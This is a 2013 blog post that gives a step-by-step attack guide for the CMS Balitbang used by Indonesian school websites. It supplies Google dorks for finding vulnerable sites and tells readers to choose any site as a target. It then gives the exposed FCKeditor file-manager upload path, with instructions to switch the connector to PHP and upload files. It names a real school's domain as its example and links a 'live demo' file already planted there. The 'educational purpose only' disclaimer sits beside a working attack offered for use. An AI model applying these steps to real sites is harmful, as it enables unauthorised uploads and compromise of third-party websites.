Sunday, 10 November 2013

CMS Balitbang Upload Vulnerabilities

This post is just for educational purpose only.



Finding Vulnerable Sites

Dorks:


inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"

Exploit:


editor/filemanager/connectors/test.html

1- Copy and paste any of these dorks on Google to find vulnerable website that contain bug at CMS Balitbang.


2- After that, choose any site as your target.


3- Example :


http://www.sman1kotabaru.sch.id/html/siswa.php?id=profil&kode=47&profil=Sistem+Point


Exploiting Target

1- Paste the exploit behind the site URL


From:


http://www.sman1kotabaru.sch.id/html/siswa.php?id=profil&kode=47&profil=Sistem+Point

To:


http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/test.html

2- You will see an UPLOAD option.

3- Change ASP to PHP

4- When your file is successfully uploaded, something like this will appear


URL: php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2F

5- To view your file, add /userfiles/file/yourfile.txt at the end of the URL 

Live Demo

http://www.sman1kotabaru.sch.id/userfiles/file/wew.txt

Good Luck :)


By Black Eagle